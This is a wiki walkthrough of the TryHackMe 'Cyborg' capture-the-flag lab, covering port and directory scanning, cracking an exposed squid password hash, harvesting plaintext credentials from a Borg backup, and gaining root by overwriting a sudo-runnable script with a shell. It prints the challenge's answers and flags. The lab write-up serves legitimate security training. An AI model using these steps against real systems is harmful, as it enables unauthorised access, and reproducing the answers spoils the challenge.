TryHackMe-Cyborg

From aldeid
Jump to navigation Jump to search

Cyborg

A box involving encrypted archives, source code analysis and more.

Compromise the machine and read the user.txt and root.txt

Scan the machine, how many ports are open?

Let’s start by scanning the machine with Nmap to identify the running services. There are 2 services exposed:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Answer: 2

What service is running on port 22?

Answer: SSH

What service is running on port 80?

Answer: HTTP

What is the user.txt flag?

Web enumeration

Gobuster reveals 2 interesting hidden locations:

[email protected]:/data/Cyborg$ gobuster dir -u http://10.10.61.219 -x php,txt,old,bak,zip,tar -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.61.219
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,old,bak,zip,tar
[+] Timeout:        10s
===============================================================
2021/04/29 11:21:34 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.zip (Status: 403)
/.hta.tar (Status: 403)
/.hta.php (Status: 403)
/.hta.txt (Status: 403)
/.hta.old (Status: 403)
/.hta.bak (Status: 403)
/.htaccess (Status: 403)
/.htaccess.old (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.zip (Status: 403)
/.htaccess.tar (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.old (Status: 403)
/.htpasswd.bak (Status: 403)
/.htpasswd.zip (Status: 403)
/.htpasswd.tar (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/admin (Status: 301) <------------------ interesting
/etc (Status: 301) <-------------------- interesting
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2021/04/29 11:25:42 Finished
===============================================================

The etc directory

The /etc directory contains a squid subdirectory, with an interesting passwd file:

[email protected]:/data/Cyborg/files$ curl -s http://10.10.61.219/etc/squid/ | html2text 
****** Index of /etc/squid ******
[[ICO]]       Name             Last_modified    Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory                    -  
[[   ]]       passwd           2020-12-30 02:09   52  
[[   ]]       squid.conf       2020-12-30 02:09  258  
===========================================================================
     Apache/2.4.18 (Ubuntu) Server at 10.10.61.219 Port 80

The passwd file contains encrypted credentials for the music_archive user:

[email protected]:/data/Cyborg/files$ curl -s http://10.10.61.219/etc/squid/passwd
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

Let’s crack the hash:

[email protected]:/data/Cyborg/files$ /data/src/john/run/john passwd.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward        (?)
1g 0:00:00:00 DONE (2021-04-29 11:43) 3.846g/s 149907p/s 149907c/s 149907C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We have found credentials: music_archive:squidward.

The admin directory

The other hidden location (/admin) is a website about music. Playing with the menus, you will find an entry to download an archive. uncompressing it leads to weird/encrypted files:

[email protected]:/data/Cyborg/files$ wget http://10.10.61.219/admin/archive.tar
[email protected]:/data/Cyborg/files$ tar xf archive.tar 
[email protected]:/data/Cyborg/files$ tree home/
home/
└── field
    └── dev
        └── final_archive
            ├── config
            ├── data
            │   └── 0
            │       ├── 1
            │       ├── 3
            │       ├── 4
            │       └── 5
            ├── hints.5
            ├── index.5
            ├── integrity.5
            ├── nonce
            └── README

5 directories, 10 files

The README file is the key as it explains what this archive is all about. It is a BorgBackup archive.

[email protected]:/data/Cyborg/files/home/field/dev/final_archive$ cat README 
This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/

The BorgBackup archive

To know more about BorgBackup and available commands, use the official documentation.

List all archives in the repository:

[email protected]:/data/Cyborg/files/home/field/dev$ borg list final_archive
Enter passphrase for key /data/Cyborg/files/home/field/dev/final_archive: 
music_archive                        Tue, 2020-12-29 15:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]

List the contents of the music_archive archive:

[email protected]:/data/Cyborg/files/home/field/dev$ borg list final_archive::music_archive
Enter passphrase for key /data/Cyborg/files/home/field/dev/final_archive: 
drwxr-xr-x alex   alex          0 Tue, 2020-12-29 14:55:52 home/alex
-rw-r--r-- alex   alex       3637 Mon, 2020-12-28 15:25:14 home/alex/.bashrc
-rw-r--r-- alex   alex        220 Mon, 2020-12-28 15:25:14 home/alex/.bash_logout
-rw-r--r-- alex   alex        675 Mon, 2020-12-28 15:25:14 home/alex/.profile
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 19:00:24 home/alex/Music
-rw------- alex   alex        439 Mon, 2020-12-28 18:26:45 home/alex/.bash_history

[REDACTED]

drwx------ root   root          0 Mon, 2020-12-28 17:33:49 home/alex/.config/sublime-text-3/Installed Packages
drwx------ root   root          0 Mon, 2020-12-28 17:33:49 home/alex/.config/ibus
drwx------ root   root          0 Mon, 2020-12-28 17:33:49 home/alex/.config/ibus/bus
drwxrwxr-x alex   alex          0 Tue, 2020-12-29 14:55:52 home/alex/Documents
-rw-r--r-- root   root        110 Tue, 2020-12-29 14:55:41 home/alex/Documents/note.txt
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:59:30 home/alex/Public
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:59:37 home/alex/Videos
drwxrwxr-x alex   alex          0 Tue, 2020-12-29 14:57:14 home/alex/Desktop
-rw-r--r-- root   root         71 Tue, 2020-12-29 14:57:14 home/alex/Desktop/secret.txt
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:59:57 home/alex/Downloads
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 19:00:02 home/alex/Templates
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 19:26:44 home/alex/Pictures

Restore the music_archive archive by extracting the files relative to the current directory:

[email protected]:/data/Cyborg/files/home/field/dev$ borg extract final_archive::music_archive
Enter passphrase for key /data/Cyborg/files/home/field/dev/final_archive: 
[email protected]:/data/Cyborg/files/home/field/dev$ tree home/
home/
└── alex
    ├── Desktop
    │   └── secret.txt
    ├── Documents
    │   └── note.txt
    ├── Downloads
    ├── Music
    ├── Pictures
    ├── Public
    ├── Templates
    └── Videos

9 directories, 2 files

Connect as alex and get the user flag

There are obviously 2 interesting documents in the recovered archive, 1 of them revealing alex’s credentials:

[email protected]:/data/Cyborg/files/home/field/dev$ cat home/alex/Desktop/secret.txt 
shoutout to all the people who have gotten to this stage whoop whoop!"
[email protected]:/data/Cyborg/files/home/field/dev$ cat home/alex/Documents/note.txt 
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:[email protected]

Now connect with SSH and get the flag:

[email protected]:/data/Cyborg/files$ ssh [email protected]
[email protected]:~$ cat user.txt 
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}

What is the root.txt flag?

Checking alex’s privileges reveals that we can run a backup.sh script as root with sudo without password:

[email protected]:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

we are owner of the script but it lacks from modification privileges:

[email protected]:~$ ls -l /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30 01:48 /etc/mp3backups/backup.sh

Let’s make the script editable and replace the content of the script to spawn a shell. As the script will be run with root privileges, we will have a root access.

[email protected]:/etc/mp3backups$ chmod +w backup.sh 
[email protected]:/etc/mp3backups$ cat > backup.sh << EOF
> #!/bin/bash
> /bin/bash
> EOF
[email protected]:/etc/mp3backups$ sudo /etc/mp3backups/backup.sh
[email protected]:/etc/mp3backups# cd /root
[email protected]:/root# cat root.txt 
flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}

Root flag: flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}